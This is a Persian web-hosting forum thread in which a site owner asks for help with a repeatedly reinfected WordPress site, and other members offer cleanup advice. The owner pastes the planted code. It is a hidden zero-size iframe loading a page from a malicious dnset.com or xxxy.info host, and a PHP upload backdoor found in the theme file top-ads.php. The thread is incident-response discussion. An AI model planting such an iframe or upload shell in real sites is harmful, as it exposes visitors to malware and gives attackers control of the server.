با سلام خدمت تمامی دوستان
نمیدونم جای درستی تاپیک زدم یا نه، اگه درست نیست مدیران لطفا انتقال بدهند.

اما ماجرا از این قراره که سایت ما هک شده و کد زیر داخل سایت ما قرار داده شده ...


<iframe src="http://ad5f82.dnset.com/b0ab0254bd58eb87/routine/8c7dd922ad47494fc02c38.php" width="0" height="0" frameborder="0">

سایت رو هم با مرورگر کروم و فایرفاکس تست کردم، اجازه ورود به سایت رو نمیده (چند نفر هم از دوستان چک کردند باز هم اجازه ورود نمیده)
چندین سایت رو چک کردم که بر اساس اون سایت ها هم سایت ویروسی هست



https://safebrowsing.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://2ax.ir
http://sitecheck.sucuri.net/results/2ax.ir
http://quttera.com/detailed_report/2ax.ir
http://scanurl.net/?u=2ax.ir&uesb=Check+This+URL#results


جالبه بدونید که به پشتیبانی هاستینگ هم تیکت زدم میگن مشکل چیه؟!!!!! کد رو بهشون دادمم فقط تیکت رو به حالت بسته شده در میارن!

21421



در یاهو مسنجر هم میگن سایت مشکلی نداره و شما بهتره دانش خودتون رو به عنوان نماینده بالا ببرید!! :|
و یک مورد دیگه که چند هفته پیش سایت ها هر روز چندین و چندین بار ارور "خطا در برقراری ارتباط با پایگاه داده" رو میدادن و این ارور فقط برای چند دقیقه پابرجا بود.
هر وقت هم که به پستیبانی تیکت زدم گفتند مشکلی نیست و هروقت ارور داد تیکت بزنید و ...

حالا چند تا سوال دارم از اساتید محترم
1. این کد داخل فایل های قالب نیست! کجا ممکنه باشه؟
2. در این قضیه من و هاستینگ چه کسی مقصر هست؟ (شاید من مقصر هستم که تند صحبت کردم)

- - - Updated - - -

از راه اندازی مجدد وردپرس استفاده کردم، کد حذف شد اما کروم همچنان اجازه ورود به سایت رو نمیده !

شاید پلاگین ها دارای باگ باشن که این ایراد و بوجود اورده باشن برای شما
بازم نمیشه دقیق گفت باید مدیر سیستم بهتون کمک کنه

دوست عزیز احتمالا داخل پلاگین ها و یا قالبی که برای سایتتون نصب کردین کدهایی وجود داشته که از نظر کروم مخرب بوده، آیا اسکریپت و قالب و پلاگین هارو از سایت های معتبری دانلود کردین؟

وردپرس رو که از wp-persian دانلود کردم، تمامی پلاگین ها هم از داخل وردپرس نصب کردم و قالب هم از سایت wpdesign.ir !
چند روز پیش هم یکی از فایل های php قالب تغییر داده شده بود و داخلش کد جاوا اسکریپت برای آپلود فایل قرار داده شده بود.
متاسفانه کد رو جایی دخیره نکردم و حذف کردم
شاید شما اساتید کد رو میدید متوجه میشدید که اشکال از کجا باشه

مشکل شما استفاده از یک سیستم پر از باگ به اسم ورد پرس هست

من اینجا یه مقاله مفصل براتون میذارم در این رابطه، زحمت خوندنش با شما دوست عزیز، ممکنه از همون قالبی که رو سایت گذاشتین باشه :



https://my.bluehost.com/cgi/help/570

سلام
پلاگین با افزونه ها رو چک کنید
یا حتی مطالب درج شده در صفحه اصلی سایتتون

دوستان با همون راه اندازی مجدد مشکل برطرف شده و اون آیفریم داخل کدهای سایت نیست
مرورگر ها هم بدون مشکل اجازه دسترسی به سایت رو میدن
اما اون سایت هایی که دادم، باز هم میگن سایت ویروسی هست
یعنی Real Time نیستند؟!

Google Safe Browsing diagnostic page for 2ax.ir (http://www.google.com/safebrowsing/diagnostic?site=2ax.ir)

سلام
به مدیر سرور انتقال بدهید که با استفاده از دستور grep این کد iframe را داخل سرور بررسی کنند تا معلوم شود فایل در کجا قرارداد ،‌ ممکن هست امنیت کل سرور به خطر افتاده باشد.

سلام
به مدیر سرور انتقال بدهید که با استفاده از دستور grep این کد iframe را داخل سرور بررسی کنند تا معلوم شود فایل در کجا قرارداد ،‌ ممکن هست امنیت کل سرور به خطر افتاده باشد.

سلام
ممنون از لطفتون ولی همون طور که در تیکت ها مشاهده کردید سرویس دهنده میگه مشکلی نیست و تیکت رو به حالت بسته در میاره
و در یاهو هم گفتند شما بیسواد هستید و دانشتون رو افزایش بدید!!! :|

دلم میخواد بدونم کدوم سایتی هست این پشتیبانیش :|
به هر حال اگر هک میشید یا از سمت ضعفه سروره یا از سمت اسکرپیت

سلام
ممنون از لطفتون ولی همون طور که در تیکت ها مشاهده کردید سرویس دهنده میگه مشکلی نیست و تیکت رو به حالت بسته در میاره
و در یاهو هم گفتند شما بیسواد هستید و دانشتون رو افزایش بدید!!! :|

قصد جسارت خدمتتان ندارم ، اما زمانی که هزینه سرویس ها پایین درنظر گرفته شده باشد و هزینه پشتیبانی اضافه نشود شاهد اینگونه برخوردها نیز باید باشید.

دلم میخواد بدونم کدوم سایتی هست این پشتیبانیش :|
به هر حال اگر هک میشید یا از سمت ضعفه سروره یا از سمت اسکرپیت

یکی از هاستینگ های معروف هستند ...
من هم این مشکل رو بهشون میگن که اگه ضعف سرور هست کل سرور دچار مشکل نشه که متاسفانه اینچنین پاسخ دادند!!


قصد جسارت خدمتتان ندارم ، اما زمانی که هزینه سرویس ها پایین درنظر گرفته شده باشد و هزینه پشتیبانی اضافه نشود شاهد اینگونه برخوردها نیز باید باشید.

خواهش میکنم
درسته، روی این هاست ریسلر، سایت های ضعیف بنده هستند و آمار چندانی ندارند، برای همین به صرفه نیست که هزینه زیادی بکنم
فقط برای چند نفر از دوستان هم هاست دادم که نمیخوام برای اون ها مشکلی پیش بیاد و از چشم من ببینند ;)

قصد جسارت خدمتتان ندارم ، اما زمانی که هزینه سرویس ها پایین درنظر گرفته شده باشد و هزینه پشتیبانی اضافه نشود شاهد اینگونه برخوردها نیز باید باشید.

الان هتسند کسانی که با هزینه های پایین پشتیبانی عالی میدهند :)

مشکل شما استفاده از یک سیستم پر از باگ به اسم ورد پرس هست

سلام
شما چه طور این نظرو میدید؟
تعجب میکنم از این نوشتتون

به باگی که پلاگین ها به وجود میارن ربطی ندید به وردپرس
وردپرس هسته ی بسیار پایداری برخوردار هست
و همیشه پلاگین ها مشکلات رو درست میکنند

دوستان دوباره سایت ما فکر کنم هک شده یا ویروس این کار ها رو انجام میده

من آیفریم رو داخل سورس قالب ندیم ولی یکی از فایل های سایت تغییر داده شده ...
فایل مربوط به فایل تبلیغات بالای مطالب بود
داخل فایل کدهای زیر قرار داده شده:



<?php
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';

$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>


دوستانی اگه لطف کنند و مشکل رو بررسی کنند ممنون میشم
پشتیبانی هاست که میگه مشکلی نیست :|

آدرس سایت: 2ax.ir (http://2ax.ir)

شما لاگ های وب سایتتون چک کردید ببینید فعل و اتفاقات سرویستون؟

دوستان دوباره سایت ما فکر کنم هک شده یا ویروس این کار ها رو انجام میده

من آیفریم رو داخل سورس قالب ندیم ولی یکی از فایل های سایت تغییر داده شده ...
فایل مربوط به فایل تبلیغات بالای مطالب بود
داخل فایل کدهای زیر قرار داده شده:



دوستانی اگه لطف کنند و مشکل رو بررسی کنند ممنون میشم
پشتیبانی هاست که میگه مشکلی نیست :|

آدرس سایت: 2ax.ir (http://2ax.ir)

دوست عزیز دقیقا چه مشکلی در ظاهر یا باطن سایت پیش اومده که شما مجدد شک کردین به هک شدن یا ویروسی شدن؟ در مورد این کدی که گذاشتین آیا مطمئن هستین که قبلا نبوده؟ فایل های قبلی رو دارید؟ مقایسه کردید با هم؟

درود

کاربر گرامی

در صورتی که هاست شما دارای نرم افزارها و فایروال های آنتی ویروس نباشد نمی تواند ویروسی بودن سایت را نیز تشخیص دهد و هر چند که شما باید امنیت سایت را اوکی کنید و امن ترین سرویسها هم امنیت هیچ سایتی را تضمین نمی کنند .

توصیه می کنم سایت را به لوکال انتقال دهید و با آنتی ویروس پی سی بررسی کنید.

از ابزار آنلاین تست امنیت سایت هم می توانید استفاده کنید . به لینکهای زیر برای تست امنیت آنلاین سایت مراجعه کنید :

https://www.acunetix.com/vulnerability-scanner/

https://safeweb.norton.com/

https://sucuri.net/

https://www.scanmyserver.com/

با تشکر

موفق و سربلند باشید

شما لاگ های وب سایتتون چک کردید ببینید فعل و اتفاقات سرویستون؟

ممنون میشم بیشتر توضیح بدید که کجا رو چک کنم


دوست عزیز دقیقا چه مشکلی در ظاهر یا باطن سایت پیش اومده که شما مجدد شک کردین به هک شدن یا ویروسی شدن؟ در مورد این کدی که گذاشتین آیا مطمئن هستین که قبلا نبوده؟ فایل های قبلی رو دارید؟ مقایسه کردید با هم؟

در قالب من فایلی هست به نام top-ads.php که مربوط میشه تبلیغات بالای صفحه
کدهایی که مربوط به پست ثابت بود حذف شده و کدی که بهتون دادم داخل اون فایل قرار داده شده بود ...
ظاهرش بصورت آپلود فایل بود ...


درود

کاربر گرامی

در صورتی که هاست شما دارای نرم افزارها و فایروال های آنتی ویروس نباشد نمی تواند ویروسی بودن سایت را نیز تشخیص دهد و هر چند که شما باید امنیت سایت را اوکی کنید و امن ترین سرویسها هم امنیت هیچ سایتی را تضمین نمی کنند .

توصیه می کنم سایت را به لوکال انتقال دهید و با آنتی ویروس پی سی بررسی کنید.

از ابزار آنلاین تست امنیت سایت هم می توانید استفاده کنید . به لینکهای زیر برای تست امنیت آنلاین سایت مراجعه کنید :

https://www.acunetix.com/vulnerability-scanner/

https://safeweb.norton.com/

https://sucuri.net/

https://www.scanmyserver.com/

با تشکر

موفق و سربلند باشید

دوست عزیز
فایل تغییر کرده خود بخود!
یعنی این سایت هک شده دیگه
درسته؟

- - - Updated - - -

دوستان الان که سایت رو چک کردم دیدم باز هم همون کدها داخل همون فایل قرار داده شده!
من صبح این ها رو حذف کرده بودم!
به نظرتون مشکل از کجاست؟

ممنون میشم بیشتر توضیح بدید که کجا رو چک کنم



در قالب من فایلی هست به نام top-ads.php که مربوط میشه تبلیغات بالای صفحه
کدهایی که مربوط به پست ثابت بود حذف شده و کدی که بهتون دادم داخل اون فایل قرار داده شده بود ...
ظاهرش بصورت آپلود فایل بود ...



دوست عزیز
فایل تغییر کرده خود بخود!
یعنی این سایت هک شده دیگه
درسته؟

- - - Updated - - -

دوستان الان که سایت رو چک کردم دیدم باز هم همون کدها داخل همون فایل قرار داده شده!
من صبح این ها رو حذف کرده بودم!
به نظرتون مشکل از کجاست؟

دوست عزیز شما زمانی که کدها رو حذف می کنید کاملا مطمئنید که درست حذف میشن؟ آیا بلافاصله بعد از اینکه حذف و سیو کردین چک میکنین که حذف شدن یا خیر؟
در هر صورت یا یک نفر دسترسی داره و اینکارو انجام میده یا بصورت خودکار کدها جنریت میشن!
البته اگر کدهای پست ثابت حذف شدن احتمالا یه نفر دسترسی داره، به نظر من در درجه اول یوزر و پس هاست رو عوض کنید و بعدش اگر بازم اکی نشد اسکریپت و قالب رو به کل عوض کنید و از نو نصب کنید و از جای معتبری هم دانلود کنید کدها رو.

دوست عزیز شما زمانی که کدها رو حذف می کنید کاملا مطمئنید که درست حذف میشن؟ آیا بلافاصله بعد از اینکه حذف و سیو کردین چک میکنین که حذف شدن یا خیر؟
در هر صورت یا یک نفر دسترسی داره و اینکارو انجام میده یا بصورت خودکار کدها جنریت میشن!
البته اگر کدهای پست ثابت حذف شدن احتمالا یه نفر دسترسی داره، به نظر من در درجه اول یوزر و پس هاست رو عوض کنید و بعدش اگر بازم اکی نشد اسکریپت و قالب رو به کل عوض کنید و از نو نصب کنید و از جای معتبری هم دانلود کنید کدها رو.

در رابطه با قسمت اول جملاتتون بله بعد از این که حذف کردم چک میکردم
در مورد قسمت دوم همین الان تذکرات شما رو انجام میدم ببینم بازهم این مشکل پیش میاد یا نه

در رابطه با قسمت اول جملاتتون بله بعد از این که حذف کردم چک میکردم
در مورد قسمت دوم همین الان تذکرات شما رو انجام میدم ببینم بازهم این مشکل پیش میاد یا نه

دوست عزیز طبق اون عکسی که تو پست اول گذاشتید به نظر میاد هاست ویروسی هستش، به این لینک نگاه کنید، همون URL ای که تو کدی که در تیکت برای پشتیبانی نوشتین اینجا ازش اسم برده شده :
Sucuri SiteCheck - Free Website Malware Scanner (http://sitecheck.sucuri.net/results/sparmehr.de)

کلا این دامین (dnset.com) و تمام سابدامین هاش مشکل دار هستن:

Sucuri Research - Website Monitoring, Recovery and Protection (http://labs.sucuri.net/?details=hillokilop.dnset.com)

اینجارو ببنید بازم همین دامین dnset.com ازش اسم برده شده، مشکلش هم مشابه مشکل شما بوده :

https://productforums.google.com/forum/#!topic/webmasters/JWI1fLp7k8E

خودتون هم میتونید تو گوگل درموردش سرچ کنید :
https://www.google.com/search?q=dnset.com+malware&oq=dnset+m&aqs=chrome.2.69i57j0l2.12721j0j4&sourceid=chrome&es_sm=93&ie=UTF-8#q=ad5f82.dnset.com+malware


حالا یا اسکریپتتون آلوده بوده و یا هاست کلا آلودست !

دوست عزیز طبق اون عکسی که تو پست اول گذاشتید به نظر میاد هاست ویروسی هستش، به این لینک نگاه کنید، همون URL ای که تو کدی که در تیکت برای پشتیبانی نوشتین اینجا ازش اسم برده شده :
Sucuri SiteCheck - Free Website Malware Scanner (http://sitecheck.sucuri.net/results/sparmehr.de)

کلا این دامین (dnset.com) و تمام سابدامین هاش مشکل دار هستن:

Sucuri Research - Website Monitoring, Recovery and Protection (http://labs.sucuri.net/?details=hillokilop.dnset.com)

اینجارو ببنید بازم همین دامین dnset.com ازش اسم برده شده، مشکلش هم مشابه مشکل شما بوده :

https://productforums.google.com/forum/#!topic/webmasters/JWI1fLp7k8E

خودتون هم میتونید تو گوگل درموردش سرچ کنید :
https://www.google.com/search?q=dnset.com+malware&oq=dnset+m&aqs=chrome.2.69i57j0l2.12721j0j4&sourceid=chrome&es_sm=93&ie=UTF-8#q=ad5f82.dnset.com+malware


حالا یا اسکریپتتون آلوده بوده و یا هاست کلا آلودست !

بله، با اکثر سایت ها که چک کردم مشکل ویروسی بودن رو اعلام کردند
مشکل من این بود که سرویس دهنده قبول نمیکرد و پشتیبانی بسیار بدی داشتند
این سایت چند بار این مشکل براش پیش اومد که به توصیه های شما عمل کردم، فعلا که مشکلی پیش نیومده
ببنیم در آینده چه اتفاقی می افته

پیشناهد میکنم سایتتون رو به یه سرویس دهنده قدیمی و معتبر انتقال بدید که مشکلی براتون پیش نیاد ...

از کدوم شرکت اشتراک دارید؟

پیشناهد میکنم سایتتون رو به یه سرویس دهنده قدیمی و معتبر انتقال بدید که مشکلی براتون پیش نیاد ...

این شرکت میشه گفت قدیمی هستند، مشکل اینجاست که هر کسی که قدیمی میشه پشتیبانی ضعیف میشه


از کدوم شرکت اشتراک دارید؟

دوست ندارم نام شرکت رو نام ببرم

-----------------------------------------------------------------------------------------

دوستان با توجه به توصیه جناب kianfar (http://www.webhostingtalk.ir/member/19162/) رمز سی پنل و وردپرس رو تغییر دادم حتی قالب سایت رو به قالب پیشفرض وردپرس تغییر دادم اما باز هم کد زیر داخل قالب قرار داده شده



<iframe src="http://a9c5d6b5.xxxy.info/b0ab0254bd58eb87/routine/8c7dd922ad47494fc02c38.php (http://www.webhostingtalk.ir/view-source:http://a9c5d6b5.xxxy.info/b0ab0254bd58eb87/routine/8c7dd922ad47494fc02c38.php)" width="0" height="0" frameborder="0"></iframe>

این شرکت میشه گفت قدیمی هستند، مشکل اینجاست که هر کسی که قدیمی میشه پشتیبانی ضعیف میشه



دوست ندارم نام شرکت رو نام ببرم

-----------------------------------------------------------------------------------------

دوستان با توجه به توصیه جناب kianfar (http://www.webhostingtalk.ir/member/19162/) رمز سی پنل و وردپرس رو تغییر دادم حتی قالب سایت رو به قالب پیشفرض وردپرس تغییر دادم اما باز هم کد زیر داخل قالب قرار داده شده

ظرفیت صندوق پیام های خصوصی djsiamak به اتمام است و تا زمانی که اقدام به خالی کردن صندوق نکند نمیتواند پیام خصوصی جدید بپذیرد.

ظرفیت صندوق پیام های خصوصی djsiamak به اتمام است و تا زمانی که اقدام به خالی کردن صندوق نکند نمیتواند پیام خصوصی جدید بپذیرد.

همین که تاپیک میزنی چندین نفر میان اسپم میکنند و توی پ.خ آفر میدن!!!! :|
پ.ن: خالی شد

مشکل که به احتمال زياد در يکي افزونه‌هاي ورد پرس هست. به جرات ميشه گفت بيش از 70 درصد ماژول‌هاي جديد و بدون ريشه ورد پرس مشکل دارند بايد خيلي احتياط کرد.
پيشنهاد ميکنم فايلهاي فعلي رو حذف و فايلهاي ورد پرس آخرين نسخه رو جايگزين و فايل کانفيگ رو اصلاح کنيد تا به ورد پرس جديد و سالم وصل بشه. اگر باز هم اين مشکل رخ داد، ممکنه خود هاست شما نقص امنيتي داشته باشه. اما اگر حل شد، تک تک آخرين نسخه پلاگين‌هايي که قبلا نصب داشتيد رو دانلود و مجددا به سايت اضافه کنيد و ببينيد وضعيت به چه شکل هست، هر ماژول که نصب ميکنيد هم قبلش چک کنيد و سايتهاي ريپورت نقص امنيتي رو بررسي کنيد که نقصي در اون گزارش نشده باشه و بعد نصب کنيد، بعد از اتمام کار، پرميشن فايلها رو 444 کنيد تا امکان رايت به غير مالک فايل نديد
اگر مشکل حل نشد و مايل بوديد pm بديد و يا اينجا مشکل رو شرح بديد تا راهنماييتون کنم :)

frameborder
برد رو ببنید ، این برد رو طول و عرضشو 0 کردن که توی قالب معلوم نشه و یا ممکنه با حذف کرد کل قالب بهم بریزه شما باید اون لینک وسط برد 0 رو حذف کنید مشکل همون لینک هستش.
ربطی به پلاگین نداره این کدی هست که به بخشی از سایت اضافه شده.

مشکل که به احتمال زياد در يکي افزونه‌هاي ورد پرس هست. به جرات ميشه گفت بيش از 70 درصد ماژول‌هاي جديد و بدون ريشه ورد پرس مشکل دارند بايد خيلي احتياط کرد.
پيشنهاد ميکنم فايلهاي فعلي رو حذف و فايلهاي ورد پرس آخرين نسخه رو جايگزين و فايل کانفيگ رو اصلاح کنيد تا به ورد پرس جديد و سالم وصل بشه. اگر باز هم اين مشکل رخ داد، ممکنه خود هاست شما نقص امنيتي داشته باشه. اما اگر حل شد، تک تک آخرين نسخه پلاگين‌هايي که قبلا نصب داشتيد رو دانلود و مجددا به سايت اضافه کنيد و ببينيد وضعيت به چه شکل هست، هر ماژول که نصب ميکنيد هم قبلش چک کنيد و سايتهاي ريپورت نقص امنيتي رو بررسي کنيد که نقصي در اون گزارش نشده باشه و بعد نصب کنيد، بعد از اتمام کار، پرميشن فايلها رو 444 کنيد تا امکان رايت به غير مالک فايل نديد
اگر مشکل حل نشد و مايل بوديد pm بديد و يا اينجا مشکل رو شرح بديد تا راهنماييتون کنم :)

خیلی ممنون از این که وقت گذاشتید و اطلاعات خودتون رو به اشتراک گذاشتید
من افزونه ها رو همیشه از داخل وردپرس نصب میکنم، یعنی داخل وردپرس سرچ میکنم، و از همونجا میزنم نصب میشه
آیا این کار باز هم باعث میشه افزونه مخرب نصب بشه؟
در مورد اینکه فایل های وردپرس رو جایگزین کنم، من از داخل پنل وردپرس، راه اندازی مجدد میزدم مشکل رفع میشد ولی چند ساعت بعد دوباره کد ایجاد میشه!
من فکر میکنم مشکل از هاست باشه، در حال انتقال هاست هستم که امیدوارم این مشکل رفع بشه


frameborder
برد رو ببنید ، این برد رو طول و عرضشو 0 کردن که توی قالب معلوم نشه و یا ممکنه با حذف کرد کل قالب بهم بریزه شما باید اون لینک وسط برد 0 رو حذف کنید مشکل همون لینک هستش.
ربطی به پلاگین نداره این کدی هست که به بخشی از سایت اضافه شده.


آیفرم آخر فایل هست با حذف کردن مشکلی پیش نمیاد
مشکل اینه که حذف میشه دوباره میاد!